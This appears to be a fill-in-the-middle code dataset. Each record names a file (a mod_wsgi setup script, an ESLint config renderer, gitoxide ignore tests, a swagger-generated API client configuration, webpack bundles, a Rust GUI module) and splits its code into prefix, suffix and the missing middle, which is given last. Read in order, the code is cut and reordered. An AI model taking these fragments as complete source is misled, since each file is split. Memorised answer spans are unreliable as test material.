LD_RUN_PATH += ':%s:%s' % (PYTHON_LIBDIR, PYTHON_CFGDIR)
LD_RUN_PATH = LD_RUN_PATH.lstrip(':')
os.environ['LD_RUN_PATH'] = LD_RUN_PATH
# On MacOS X, recent versions of Apple's Apache do not support compiling
# Apache modules with a target older than 10.8. This is because it
# screws up Apache APR % formats for apr_time_t, which breaks daemon
# mode queue time. Force the target to be 10.8 or newer for now if the Python
# installation supports older versions. This means that things will not
# build for older MacOS X versions. Deal with these when they occur.
if sys.platform == 'darwin':
target = os.environ.get('MACOSX_DEPLOYMENT_TARGET')
if target is None:
target = get_python_config('MACOSX_DEPLOYMENT_TARGET')
if target:
target_version = tuple(map(int, target.split('.')))
#assert target_version >= (10, 8), \
# 'Minimum of 10.8 for MACOSX_DEPLOYMENT_TARGET'
if target_version < (10, 8):
os.environ['MACOSX_DEPLOYMENT_TARGET'] = '10.8'
# Now add the definitions to build everything.
if os.name == 'nt':
extension_name = 'mod_wsgi.server.mod_wsgi'
else:
extension_name = 'mod_wsgi.server.mod_wsgi-py%s%s' % sys.version_info[:2]
extension = Extension(extension_name, source_files,
include_dirs=INCLUDE_DIRS, extra_compile_args=EXTRA_COMPILE_FLAGS,
extra_link_args=EXTRA_LINK_ARGS)
def _documentation():
result = []
prefix = 'docs/_build/html'
for root, dirs, files in os.walk(prefix, topdown=False):
for name in files:
if root == prefix:
result.append(os.path.join(root[len(prefix):], name))
else:
result.append(os.path.join(root[len(prefix)+1:], name))
return result
def _version():
path = 'src/server/wsgi_version.h'
pattern = r'#define MOD_WSGI_VERSION_STRING "(?P<version>[^"]*)"'
with open(path, 'r') as fp:
match = re.search(pattern, fp.read(), flags=re.MULTILINE)
return match.group('version')
# Final check to make sure a shared library for Python does actually
# exist. Warn if one doesn't as we really want a shared library.
SHARED_LIBRARY_WARNING = """
WARNING: The Python installation you are using does not appear to have
been installed with a shared library, or in the case of MacOS X, as a
framework. Where these are not present, the compilation of mod_wsgi may
fail, or if it does succeed, will result in extra memory being used by
all processes at run time as a result of the static library needing to
be loaded in its entirety to every process. It is highly recommended
that you reinstall the Python installation being used from source code,
supplying the '--enable-shared' option to the 'configure' script when
configuring the source code prior to building and installing it.
"""
if os.name != 'nt':
if (not get_python_config('Py_ENABLE_SHARED') and
not get_python_config('PYTHONFRAMEWORK')):
print(SHARED_LIBRARY_WARNING)
# Now finally run distutils.
long_description = open('README.rst').read()
setup(name = 'mod_wsgi',
version = _version(),
description = 'Installer for Apache/mod_wsgi.',
long_description = long_description,
author = 'Graham Dumpleton',
author_email = '[email protected]',
maintainer = 'Graham Dumpleton',
maintainer_email = '[email protected]',
url = 'http://www.modwsgi.org/',
bugtrack_url = 'https://github.com/GrahamDumpleton/mod_wsgi/issues',
license = 'Apache License, Version 2.0',
platforms = [],
download_url = None,
classifiers = [
'Development Status :: 6 - Mature',
'License :: OSI Approved :: Apache Software License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: POSIX',
'Operating System :: POSIX :: BSD',
'Operating System :: POSIX :: Linux',
'Operating System :: POSIX :: SunOS/Solaris',
'Programming Language :: Python',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Internet :: WWW/HTTP :: WSGI',
'Topic :: Internet :: WWW/HTTP :: WSGI :: Server'
],
keywords = 'mod_wsgi wsgi apache',
packages = ['mod_wsgi', 'mod_wsgi.server', 'mod_wsgi.server.management',
'mod_wsgi.server.management.commands', 'mod_wsgi.docs',
'mod_wsgi.images'],
package_dir = {'mod_wsgi': 'src', 'mod_wsgi.docs': 'docs/_build/html',
'mod_wsgi.images': 'images'},
package_data = {'mod_wsgi.docs': _documentation(),
'mod_wsgi.images': ['snake-whiskey.jpg']},
ext_modules = [extension],
entry_points = { 'console_scripts':
['mod_wsgi-express = mod_wsgi.server:main'],},
zip_safe = False,
)
|
find_program
|
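The shared-library check near the end of the setup script above can be reproduced from any interpreter with the standard sysconfig module; Py_ENABLE_SHARED and PYTHONFRAMEWORK are the same variables the script queries. A minimal sketch, assuming nothing beyond the standard library:
# Minimal sketch: the same shared-library probe the setup script performs,
# using sysconfig instead of the script's get_python_config() helper.
import sysconfig

def has_shared_libpython():
    # Py_ENABLE_SHARED is truthy for --enable-shared builds; PYTHONFRAMEWORK
    # is non-empty for MacOS X framework builds.
    return bool(sysconfig.get_config_var('Py_ENABLE_SHARED')) or \
        bool(sysconfig.get_config_var('PYTHONFRAMEWORK'))

if not has_shared_libpython():
    print('WARNING: this Python has no shared library or framework')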
render-plugin-configs.js
|
#!/usr/bin/env node
'use strict';
const fs = require('fs');
const path = require('path');
const writeFile = require('util').promisify(fs.writeFile);
/* eslint-disable import/no-extraneous-dependencies */
const { ESLint } = require('eslint');
const ConfigValidator = require('@eslint/eslintrc/lib/shared/config-validator');
const BuiltInEnvironments = require('@eslint/eslintrc/conf/environments');
/* eslint-enable import/no-extraneous-dependencies */
const { getPluginEnvironments } = require('./plugins');
const PLUGIN_ENVIRONMENTS = new Map(Object.entries(getPluginEnvironments()));
async function main() {
const jestTask = renderConfig(
'jest',
{
extends: ['zillow/jest'],
rules: {
// plugin-specific rules that hamper effective testing
'@typescript-eslint/no-invalid-void-type': ['off'],
'no-import-assign': ['off'],
'react/prop-types': ['off'],
},
},
[
// prettier-ignore
'**/*{-,.}test.[jt]s?(x)',
'**/*.stories.[jt]s?(x)',
'**/__tests__/**/*.[jt]s?(x)',
'**/__mocks__/**/*.[jt]s?(x)',
'**/test/**/*.[jt]s?(x)',
]
);
const mochaTask = renderConfig(
'mocha',
{
extends: ['zillow/mocha'],
rules: {
// mocha does fancy things with test case scope,
// and this conflicts with mocha/no-mocha-arrow
'prefer-arrow-callback': 'off',
'func-names': 'off',
'no-import-assign': ['off'],
'react/prop-types': ['off'],
},
},
[
// prettier-ignore
'**/*-test.[jt]s?(x)',
'**/test/**/*.[jt]s?(x)',
]
);
const recommendedTask = renderConfig('recommended', {
extends: ['zillow'],
parser: 'babel-eslint',
rules: {
// TODO: re-enable when https://github.com/yannickcr/eslint-plugin-react/commit/2b0d70c is released
'react/prop-types': ['off'],
},
});
const typescriptTask = renderConfig(
'typescript',
{
extends: ['zillow-typescript'],
parser: '@typescript-eslint/parser',
},
['**/*.ts?(x)']
);
/* istanbul ignore next (catch doesn't need coverage) */
try {
await Promise.all([jestTask, mochaTask, recommendedTask, typescriptTask]);
} catch (error) {
// eslint-disable-next-line no-console
console.error(error);
process.exitCode = 1;
}
}
/**
* Render specified ESLint config to JSON file
* @param {string} name
* @param {{ extends: string[], rules?: { [k: string]: any }}} config
* @param {string[]} [overrides] List of override file globs
*/
async function renderConfig(name, config, overrides) {
const validator = new ConfigValidator();
const computedConfig = await getComputedConfig(config);
const wrappedConfig = wrapInPlugin(computedConfig, overrides);
const targetPath = path.resolve(__dirname, `./configs/${name}.json`);
validator.validate(
wrappedConfig,
config.extends[0],
() => {},
// (slightly less) horrible cheese to avoid exploding
envName => PLUGIN_ENVIRONMENTS.get(envName.replace('zillow/', ''))
);
/* istanbul ignore if */
if (process.env.NODE_ENV !== 'test') {
// eslint-disable-next-line no-console
console.log(`writing ${path.relative('.', targetPath)}`);
}
await writeFile(targetPath, JSON.stringify(wrappedConfig, null, 2));
}
/**
* Generate ESLint config object from specified baseConfig
* @param {{ extends: string[], rules?: { [k: string]: any }}} baseConfig
*/
async function getComputedConfig(baseConfig) {
const engine = new ESLint({
useEslintrc: false,
allowInlineConfig: false,
baseConfig,
});
const computed = await engine.calculateConfigForFile('index.js');
// remove unnecessary fields
delete computed.filePath;
delete computed.baseDirectory;
// un-resolve parser (re-resolved during re-export)
if (computed.parser && baseConfig.parser && computed.parser !== baseConfig.parser) {
computed.parser = baseConfig.parser;
}
return computed;
}
function wrapInPlugin(config, files) {
// if files passed, this whole block will be moved to overrides[0]
const pluginConfig = {
files,
// We expose a config already computed from the whole extends chain, so no extends here.
...config,
extends: [],
// Plugins appear to come from this plugin, so it's the only one externally visible.
plugins: ['zillow'],
// The rules from third-party plugins need to be prefixed so they reference our namespace.
rules: prefixRuleConfigs('zillow', config.rules),
};
// if non-builtin envs are passed, make sure they're properly prefixed
if (pluginConfig.env) {
const ourEnv = {};
// eslint-disable-next-line no-restricted-syntax
for (const envName of Object.keys(pluginConfig.env)) {
if (BuiltInEnvironments.has(envName)) {
// pass through builtin environments
ourEnv[envName] = pluginConfig.env[envName];
} else {
// needs prefix to find our wrapper
ourEnv[`zillow/${envName}`] = pluginConfig.env[envName];
}
}
pluginConfig.env = ourEnv;
}
if (files) {
// https://eslint.org/docs/user-guide/configuring#configuration-based-on-glob-patterns
delete pluginConfig.extends;
delete pluginConfig.ignorePatterns;
delete pluginConfig.overrides;
delete pluginConfig.root;
if (pluginConfig.parserOptions && Object.keys(pluginConfig.parserOptions).length === 0) {
delete pluginConfig.parserOptions;
}
return { overrides: [pluginConfig] };
}
// "files" only valid in overrides
delete pluginConfig.files;
return pluginConfig;
}
/**
* Adds a prefix to rules that come from plugins.
*/
function
|
(prefix, rules) {
return Object.keys(rules).reduce((acc, name) => {
// Plugin rules always have a slash in the name
if (name.indexOf('/') !== -1) {
acc[`${prefix}/${name}`] = rules[name];
} else {
acc[name] = rules[name];
}
return acc;
}, {});
}
/* istanbul ignore if */
if (require.main === module) {
// node lib/render-configs.js
main();
} else {
module.exports = main;
}
|
prefixRuleConfigs
|
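The prefixRuleConfigs helper above re-keys third-party plugin rules (any rule name containing a slash) under the wrapper plugin's namespace while passing core rules through. A rough Python rendering of the same transform, for illustration only:
# Sketch of the prefixRuleConfigs transform: plugin rules gain the wrapper
# prefix, ESLint core rules are left untouched.
def prefix_rule_configs(prefix, rules):
    return {(prefix + '/' + name if '/' in name else name): config
            for name, config in rules.items()}

assert prefix_rule_configs('zillow', {
    'func-names': 'off',
    'react/prop-types': ['off'],
}) == {'func-names': 'off', 'zillow/react/prop-types': ['off']}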
mod.rs
|
mod ignore {
use std::io::Read;
use bstr::{BStr, ByteSlice};
use git_attributes::{Ignore, Match, MatchGroup};
use git_glob::pattern::Case;
struct Expectations<'a> {
lines: bstr::Lines<'a>,
}
impl<'a> Iterator for Expectations<'a> {
type Item = (&'a BStr, Option<(&'a BStr, usize, &'a BStr)>);
fn next(&mut self) -> Option<Self::Item> {
let line = self.lines.next()?;
let (left, value) = line.split_at(line.find_byte(b'\t').unwrap());
let value = value[1..].as_bstr();
let source_and_line = if left == b"::" {
None
} else {
let mut tokens = left.split(|b| *b == b':');
let source = tokens.next().unwrap().as_bstr();
let line_number: usize = tokens.next().unwrap().to_str_lossy().parse().ok().unwrap();
let pattern = tokens.next().unwrap().as_bstr();
Some((source, line_number, pattern))
};
Some((value, source_and_line))
}
}
#[test]
fn from_git_dir() -> crate::Result {
let dir = git_testtools::scripted_fixture_repo_read_only("make_global_and_external_and_dir_ignores.sh")?;
|
let baseline = std::fs::read(git_dir.parent().unwrap().join("git-check-ignore.baseline"))?;
let mut buf = Vec::new();
let mut group = MatchGroup::from_git_dir(git_dir, Some(dir.join("user.exclude")), &mut buf)?;
assert!(
!group.add_patterns_file("not-a-file", false, None, &mut buf)?,
"missing files are no problem and cause a negative response"
);
assert!(
group.add_patterns_file(repo_dir.join(".gitignore"), true, repo_dir.as_path().into(), &mut buf)?,
"existing files return true"
);
buf.clear();
let ignore_file = repo_dir.join("dir-with-ignore").join(".gitignore");
std::fs::File::open(&ignore_file)?.read_to_end(&mut buf)?;
group.add_patterns_buffer(&buf, ignore_file, repo_dir.as_path().into());
for (path, source_and_line) in (Expectations {
lines: baseline.lines(),
}) {
let actual = group.pattern_matching_relative_path(
path,
repo_dir
.join(path.to_str_lossy().as_ref())
.metadata()
.ok()
.map(|m| m.is_dir()),
Case::Sensitive,
);
match (actual, source_and_line) {
(
Some(Match {
sequence_number,
pattern: _,
source,
value: _,
}),
Some((expected_source, line, _expected_pattern)),
) => {
assert_eq!(sequence_number, line, "our counting should match the one used in git");
assert_eq!(
source.map(|p| p.canonicalize().unwrap()),
Some(repo_dir.join(expected_source.to_str_lossy().as_ref()).canonicalize()?)
);
}
(None, None) => {}
(actual, expected) => panic!("actual {:?} should match {:?} with path '{}'", actual, expected, path),
}
}
Ok(())
}
#[test]
fn from_overrides() {
let input = ["simple", "pattern/"];
let group = git_attributes::MatchGroup::<Ignore>::from_overrides(input);
assert_eq!(
group.pattern_matching_relative_path("Simple", None, git_glob::pattern::Case::Fold),
Some(pattern_to_match(&git_glob::parse("simple").unwrap(), 0))
);
assert_eq!(
group.pattern_matching_relative_path("pattern", Some(true), git_glob::pattern::Case::Sensitive),
Some(pattern_to_match(&git_glob::parse("pattern/").unwrap(), 1))
);
assert_eq!(group.patterns.len(), 1);
assert_eq!(
git_attributes::PatternList::<Ignore>::from_overrides(input),
group.patterns.into_iter().next().unwrap()
);
}
fn pattern_to_match(pattern: &git_glob::Pattern, sequence_number: usize) -> Match<'_, ()> {
Match {
pattern,
value: &(),
source: None,
sequence_number,
}
}
}
|
let repo_dir = dir.join("repo");
let git_dir = repo_dir.join(".git");
|
configuration.py
|
# coding: utf-8
"""
barcodeapi
Barcode APIs let you generate barcode images, and recognize values from images of barcodes. # noqa: E501
OpenAPI spec version: v1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import copy
import logging
import multiprocessing
import sys
import urllib3
import six
from six.moves import http_client as httplib
class Configuration(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Ref: https://github.com/swagger-api/swagger-codegen
Do not edit the class manually.
"""
_default = None
def __init__(self):
"""Constructor"""
if self._default:
for key in self._default.__dict__.keys():
self.__dict__[key] = copy.copy(self._default.__dict__[key])
return
# Default Base url
self.host = "https://api.cloudmersive.com"
# Temp file folder for downloading files
self.temp_folder_path = None
# Authentication Settings
# dict to store API key(s)
self.api_key = {}
# dict to store API prefix (e.g. Bearer)
self.api_key_prefix = {}
# function to refresh API key if expired
self.refresh_api_key_hook = None
# Username for HTTP basic authentication
self.username = ""
# Password for HTTP basic authentication
self.password = ""
# Logging Settings
self.logger = {}
self.logger["package_logger"] = logging.getLogger("cloudmersive_barcode_api_client")
self.logger["urllib3_logger"] = logging.getLogger("urllib3")
# Log format
self.logger_format = '%(asctime)s %(levelname)s %(message)s'
# Log stream handler
|
# Debug file location
self.logger_file = None
# Debug switch
self.debug = False
# SSL/TLS verification
# Set this to false to skip verifying SSL certificate when calling API
# from https server.
self.verify_ssl = True
# Set this to customize the certificate file to verify the peer.
self.ssl_ca_cert = None
# client certificate file
self.cert_file = None
# client key file
self.key_file = None
# Set this to True/False to enable/disable SSL hostname verification.
self.assert_hostname = None
# urllib3 connection pool's maximum number of connections saved
# per pool. urllib3 uses 1 connection as default value, but this is
# not the best value when you are making a lot of possibly parallel
# requests to the same host, which is often the case here.
# cpu_count * 5 is used as default value to increase performance.
self.connection_pool_maxsize = multiprocessing.cpu_count() * 5
# Proxy URL
self.proxy = None
# Safe chars for path_param
self.safe_chars_for_path_param = ''
@classmethod
def set_default(cls, default):
cls._default = default
@property
def logger_file(self):
"""The logger file.
If the logger_file is None, then add stream handler and remove file
handler. Otherwise, add file handler and remove stream handler.
:param value: The logger_file path.
:type: str
"""
return self.__logger_file
@logger_file.setter
def logger_file(self, value):
"""The logger file.
If the logger_file is None, then add stream handler and remove file
handler. Otherwise, add file handler and remove stream handler.
:param value: The logger_file path.
:type: str
"""
self.__logger_file = value
if self.__logger_file:
# If set logging file,
# then add file handler and remove stream handler.
self.logger_file_handler = logging.FileHandler(self.__logger_file)
self.logger_file_handler.setFormatter(self.logger_formatter)
for _, logger in six.iteritems(self.logger):
logger.addHandler(self.logger_file_handler)
if self.logger_stream_handler:
logger.removeHandler(self.logger_stream_handler)
else:
# If not set logging file,
# then add stream handler and remove file handler.
self.logger_stream_handler = logging.StreamHandler()
self.logger_stream_handler.setFormatter(self.logger_formatter)
for _, logger in six.iteritems(self.logger):
logger.addHandler(self.logger_stream_handler)
if self.logger_file_handler:
logger.removeHandler(self.logger_file_handler)
@property
def debug(self):
"""Debug status
:param value: The debug status, True or False.
:type: bool
"""
return self.__debug
@debug.setter
def debug(self, value):
"""Debug status
:param value: The debug status, True or False.
:type: bool
"""
self.__debug = value
if self.__debug:
# if debug status is True, turn on debug logging
for _, logger in six.iteritems(self.logger):
logger.setLevel(logging.DEBUG)
# turn on httplib debug
httplib.HTTPConnection.debuglevel = 1
else:
# if debug status is False, turn off debug logging,
# setting log level to default `logging.WARNING`
for _, logger in six.iteritems(self.logger):
logger.setLevel(logging.WARNING)
# turn off httplib debug
httplib.HTTPConnection.debuglevel = 0
@property
def logger_format(self):
"""The logger format.
The logger_formatter will be updated when sets logger_format.
:param value: The format string.
:type: str
"""
return self.__logger_format
@logger_format.setter
def logger_format(self, value):
"""The logger format.
The logger_formatter will be updated when sets logger_format.
:param value: The format string.
:type: str
"""
self.__logger_format = value
self.logger_formatter = logging.Formatter(self.__logger_format)
def get_api_key_with_prefix(self, identifier):
"""Gets API key (with prefix if set).
:param identifier: The identifier of apiKey.
:return: The token for api key authentication.
"""
if self.refresh_api_key_hook:
self.refresh_api_key_hook(self)
key = self.api_key.get(identifier)
if key:
prefix = self.api_key_prefix.get(identifier)
if prefix:
return "%s %s" % (prefix, key)
else:
return key
def get_basic_auth_token(self):
"""Gets HTTP basic authentication header (string).
:return: The token for basic HTTP authentication.
"""
return urllib3.util.make_headers(
basic_auth=self.username + ':' + self.password
).get('authorization')
def auth_settings(self):
"""Gets Auth Settings dict for api client.
:return: The Auth Settings information dict.
"""
return {
'Apikey':
{
'type': 'api_key',
'in': 'header',
'key': 'Apikey',
'value': self.get_api_key_with_prefix('Apikey')
},
}
def to_debug_report(self):
"""Gets the essential information for debugging.
:return: The report for debugging.
"""
return "Python SDK Debug Report:\n"\
"OS: {env}\n"\
"Python Version: {pyversion}\n"\
"Version of the API: v1\n"\
"SDK Package Version: 3.0.2".\
format(env=sys.platform, pyversion=sys.version)
|
self.logger_stream_handler = None
# Log file handler
self.logger_file_handler = None
|
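The generated Configuration class keeps credentials in the api_key and api_key_prefix dicts, keyed by the auth identifier ('Apikey' in auth_settings above). A short usage sketch; the import path is an assumption based on the package logger name:
# Usage sketch (import path assumed from the logger name above).
from cloudmersive_barcode_api_client import Configuration  # assumed path

config = Configuration()
config.api_key['Apikey'] = 'YOUR-API-KEY'
config.api_key_prefix['Apikey'] = 'Token'  # optional prefix
# -> 'Token YOUR-API-KEY', as built by get_api_key_with_prefix()
header_value = config.get_api_key_with_prefix('Apikey')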
front.js
|
window["cms-plugincopyright"]=(()=>{var e={236:(e,t,r)=>{"use strict";r.d(t,{Z:()=>n});const n={}},788:(e,t,r)=>{"use strict";r.d(t,{Z:()=>n});const n={}},978:(e,t,r)=>{"use strict";r.d(t,{Z:()=>n});const n={}},137:(e,t,r)=>{"use strict";r.d(t,{Z:()=>n});const n={"zh-cn":r(978).Z}},292:(e,t,r)=>{"use strict";var n;r.r(t),r.d(t,{default:()=>o}),r(824);const o={install:function(e,t){return n?console.error("already installed."):(n=e,t({routes:r(644).Z,store:r(81).Z(n),config:r(788).Z,locales:r(137).Z,components:r(236).Z}))}}},644:(e,t,r)=>{"use strict";r.d(t,{Z:()=>n});const n=[]},81:(e,t,r)=>{"use strict";function
|
(e){return{state:{},getters:{},mutations:{},actions:{}}}r.d(t,{Z:()=>n})},891:(e,t,r)=>{var n=r(233),o=r(361)(n);o.push([e.id,"","",{version:3,sources:[],names:[],mappings:"",sourceRoot:""}]),e.exports=o},361:e=>{"use strict";e.exports=function(e){var t=[];return t.toString=function(){return this.map((function(t){var r=e(t);return t[2]?"@media ".concat(t[2]," {").concat(r,"}"):r})).join("")},t.i=function(e,r,n){"string"==typeof e&&(e=[[null,e,""]]);var o={};if(n)for(var a=0;a<this.length;a++){var s=this[a][0];null!=s&&(o[s]=!0)}for(var i=0;i<e.length;i++){var c=[].concat(e[i]);n&&o[c[0]]||(r&&(c[2]?c[2]="".concat(r," and ").concat(c[2]):c[2]=r),t.push(c))}},t}},233:e=>{"use strict";function t(e,t){(null==t||t>e.length)&&(t=e.length);for(var r=0,n=new Array(t);r<t;r++)n[r]=e[r];return n}e.exports=function(e){var r,n,o=(n=4,function(e){if(Array.isArray(e))return e}(r=e)||function(e,t){if("undefined"!=typeof Symbol&&Symbol.iterator in Object(e)){var r=[],n=!0,o=!1,a=void 0;try{for(var s,i=e[Symbol.iterator]();!(n=(s=i.next()).done)&&(r.push(s.value),!t||r.length!==t);n=!0);}catch(e){o=!0,a=e}finally{try{n||null==i.return||i.return()}finally{if(o)throw a}}return r}}(r,n)||function(e,r){if(e){if("string"==typeof e)return t(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);return"Object"===n&&e.constructor&&(n=e.constructor.name),"Map"===n||"Set"===n?Array.from(e):"Arguments"===n||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n)?t(e,r):void 0}}(r,n)||function(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}()),a=o[1],s=o[3];if("function"==typeof btoa){var i=btoa(unescape(encodeURIComponent(JSON.stringify(s)))),c="sourceMappingURL=data:application/json;charset=utf-8;base64,".concat(i),u="/*# ".concat(c," */"),l=s.sources.map((function(e){return"/*# sourceURL=".concat(s.sourceRoot||"").concat(e," */")}));return[a].concat(l).concat([u]).join("\n")}return[a].join("\n")}},824:(e,t,r)=>{var n=r(891);"string"==typeof n&&(n=[[e.id,n,""]]),n.locals&&(e.exports=n.locals),(0,r(159).Z)("14c3b990",n,!0,{})},159:(e,t,r)=>{"use strict";function n(e,t){for(var r=[],n={},o=0;o<t.length;o++){var a=t[o],s=a[0],i={id:e+":"+o,css:a[1],media:a[2],sourceMap:a[3]};n[s]?n[s].parts.push(i):r.push(n[s]={id:s,parts:[i]})}return r}r.d(t,{Z:()=>v});var o="undefined"!=typeof document;if("undefined"!=typeof DEBUG&&DEBUG&&!o)throw new Error("vue-style-loader cannot be used in a non-browser environment. 
Use { target: 'node' } in your Webpack config to indicate a server-rendering environment.");var a={},s=o&&(document.head||document.getElementsByTagName("head")[0]),i=null,c=0,u=!1,l=function(){},d=null,f="data-vue-ssr-id",p="undefined"!=typeof navigator&&/msie [6-9]\b/.test(navigator.userAgent.toLowerCase());function v(e,t,r,o){u=r,d=o||{};var s=n(e,t);return h(s),function(t){for(var r=[],o=0;o<s.length;o++){var i=s[o];(c=a[i.id]).refs--,r.push(c)}for(t?h(s=n(e,t)):s=[],o=0;o<r.length;o++){var c;if(0===(c=r[o]).refs){for(var u=0;u<c.parts.length;u++)c.parts[u]();delete a[c.id]}}}}function h(e){for(var t=0;t<e.length;t++){var r=e[t],n=a[r.id];if(n){n.refs++;for(var o=0;o<n.parts.length;o++)n.parts[o](r.parts[o]);for(;o<r.parts.length;o++)n.parts.push(m(r.parts[o]));n.parts.length>r.parts.length&&(n.parts.length=r.parts.length)}else{var s=[];for(o=0;o<r.parts.length;o++)s.push(m(r.parts[o]));a[r.id]={id:r.id,refs:1,parts:s}}}}function y(){var e=document.createElement("style");return e.type="text/css",s.appendChild(e),e}function m(e){var t,r,n=document.querySelector("style["+f+'~="'+e.id+'"]');if(n){if(u)return l;n.parentNode.removeChild(n)}if(p){var o=c++;n=i||(i=y()),t=S.bind(null,n,o,!1),r=S.bind(null,n,o,!0)}else n=y(),t=x.bind(null,n),r=function(){n.parentNode.removeChild(n)};return t(e),function(n){if(n){if(n.css===e.css&&n.media===e.media&&n.sourceMap===e.sourceMap)return;t(e=n)}else r()}}var g,b=(g=[],function(e,t){return g[e]=t,g.filter(Boolean).join("\n")});function S(e,t,r,n){var o=r?"":n.css;if(e.styleSheet)e.styleSheet.cssText=b(t,o);else{var a=document.createTextNode(o),s=e.childNodes;s[t]&&e.removeChild(s[t]),s.length?e.insertBefore(a,s[t]):e.appendChild(a)}}function x(e,t){var r=t.css,n=t.media,o=t.sourceMap;if(n&&e.setAttribute("media",n),d.ssrId&&e.setAttribute(f,t.id),o&&(r+="\n/*# sourceURL="+o.sources[0]+" */",r+="\n/*# sourceMappingURL=data:application/json;base64,"+btoa(unescape(encodeURIComponent(JSON.stringify(o))))+" */"),e.styleSheet)e.styleSheet.cssText=r;else{for(;e.firstChild;)e.removeChild(e.firstChild);e.appendChild(document.createTextNode(r))}}},142:e=>{function t(e){var t=new Error("Cannot find module '"+e+"'");throw t.code="MODULE_NOT_FOUND",t}t.keys=()=>[],t.resolve=t,t.id=142,e.exports=t}},t={};function r(n){if(t[n])return t[n].exports;var o=t[n]={id:n,exports:{}};return e[n](o,o.exports,r),o.exports}return r.n=e=>{var t=e&&e.__esModule?()=>e.default:()=>e;return r.d(t,{a:t}),t},r.d=(e,t)=>{for(var n in t)r.o(t,n)&&!r.o(e,n)&&Object.defineProperty(e,n,{enumerable:!0,get:t[n]})},r.o=(e,t)=>Object.prototype.hasOwnProperty.call(e,t),r.r=e=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},r(292)})();
//# sourceMappingURL=front.js.map
|
n
|
jss-camel-case.js
|
(function webpackUniversalModuleDefinition(root, factory) {
if(typeof exports === 'object' && typeof module === 'object')
module.exports = factory();
else if(typeof define === 'function' && define.amd)
define([], factory);
else if(typeof exports === 'object')
exports["jssCamelCase"] = factory();
else
root["jssCamelCase"] = factory();
})(this, function() {
return /******/ (function(modules) { // webpackBootstrap
/******/ // The module cache
/******/ var installedModules = {};
/******/ // The require function
/******/ function
|
(moduleId) {
/******/ // Check if module is in cache
/******/ if(installedModules[moduleId])
/******/ return installedModules[moduleId].exports;
/******/ // Create a new module (and put it into the cache)
/******/ var module = installedModules[moduleId] = {
/******/ exports: {},
/******/ id: moduleId,
/******/ loaded: false
/******/ };
/******/ // Execute the module function
/******/ modules[moduleId].call(module.exports, module, module.exports, __webpack_require__);
/******/ // Flag the module as loaded
/******/ module.loaded = true;
/******/ // Return the exports of the module
/******/ return module.exports;
/******/ }
/******/ // expose the modules object (__webpack_modules__)
/******/ __webpack_require__.m = modules;
/******/ // expose the module cache
/******/ __webpack_require__.c = installedModules;
/******/ // __webpack_public_path__
/******/ __webpack_require__.p = "";
/******/ // Load entry module and return exports
/******/ return __webpack_require__(0);
/******/ })
/************************************************************************/
/******/ ([
/* 0 */
/***/ function(module, exports) {
"use strict";
Object.defineProperty(exports, "__esModule", {
value: true
});
var regExp = /([A-Z])/g;
/**
* Replace a string passed from String#replace.
* @param {String} str
* @return {String}
*/
function replace(str) {
return "-" + str.toLowerCase();
}
/**
* Convert camel cased property names to dash separated.
*
* @param {Object} style
* @return {Object}
*/
function convertCase(style) {
var converted = {};
for (var prop in style) {
var value = style[prop];
prop = prop.replace(regExp, replace);
converted[prop] = value;
}
if (style.fallbacks) {
if (Array.isArray(style.fallbacks)) converted.fallbacks = style.fallbacks.map(convertCase);else converted.fallbacks = convertCase(style.fallbacks);
}
return converted;
}
/**
* Allow camel cased property names by converting them back to dasherized.
*
* @param {Rule} rule
*/
exports["default"] = function () {
return function (rule) {
var style = rule.style;
if (!style) return;
if (Array.isArray(style)) {
// Handle rules like @font-face, which can have multiple styles in an array
for (var index = 0; index < style.length; index++) {
style[index] = convertCase(style[index]);
}
return;
}
rule.style = convertCase(style);
};
};
/***/ }
/******/ ])
});
;
|
__webpack_require__
|
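convertCase above dasherizes camelCase property names with a single capture-group regex and a lowercasing replacer. The same idea in a few lines of Python, purely as an illustration:
# Sketch of the camelCase -> dash-separated conversion performed by
# convertCase above, using the same single-capture-group regex idea.
import re

def convert_case(style: dict) -> dict:
    return {re.sub(r'([A-Z])', lambda m: '-' + m.group(1).lower(), k): v
            for k, v in style.items()}

assert convert_case({'fontSize': '12px'}) == {'font-size': '12px'}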
gui.rs
|
use super::widget::Widget;
use super::bounds::WidgetBounds;
use super::layouts::layout::Layout;
use super::container::Container;
use super::gui_input_responder::GUIInputResponder;
use gui::core::graphics::Graphics;
use gui::core::mouse::{MouseClickEvent, MouseDragEvent, MouseMoveEvent};
use gui::core::keyboard::KeyEvent;
use gui::core::input_responder::InputResponder;
use gui::themes::theme::Theme;
use utils::shared::{share, Shared, WeakShared};
use utils::size::Size;
use std::rc::Rc;
use std::cell::{Ref, RefMut};
pub struct WidgetGUI {
theme: Theme,
root: Shared<Container>,
this: WeakShared<WidgetGUI>,
dragged: Option<WeakShared<Widget>>,
current_global_widget_id: u32
}
impl WidgetGUI {
pub fn new<L>(width: u32, height: u32, base_layout: L) -> Shared<Self> where L: 'static + Layout {
let root = share(Container::new(base_layout));
{
let mut root_ref = root.borrow_mut();
root_ref.base_mut().set_bounds(WidgetBounds::new(0, 0, width, height));
root_ref.set_preferred_size(Size::of(width, height));
root_ref.set_has_background(false);
}
let instance = share(WidgetGUI {
theme: Theme::light(),
root: root,
this: WeakShared::new(),
dragged: None,
current_global_widget_id: 0
});
{
let mut instance_ref = instance.borrow_mut();
let this = Rc::downgrade(&instance);
instance_ref.root.borrow_mut().set_gui(this.clone());
instance_ref.this = this;
}
instance
}
pub fn next_global_widget_id(&mut self) -> u32 {
let id = self.current_global_widget_id;
self.current_global_widget_id += 1;
id
}
pub fn root(&self) -> Shared<Container> { self.root.clone() }
pub fn borrow_root_mut(&self) -> RefMut<Container> { self.root.borrow_mut() }
pub fn borrow_root(&self) -> Ref<Container> { self.root.borrow() }
pub fn theme(&self) -> &Theme { &self.theme }
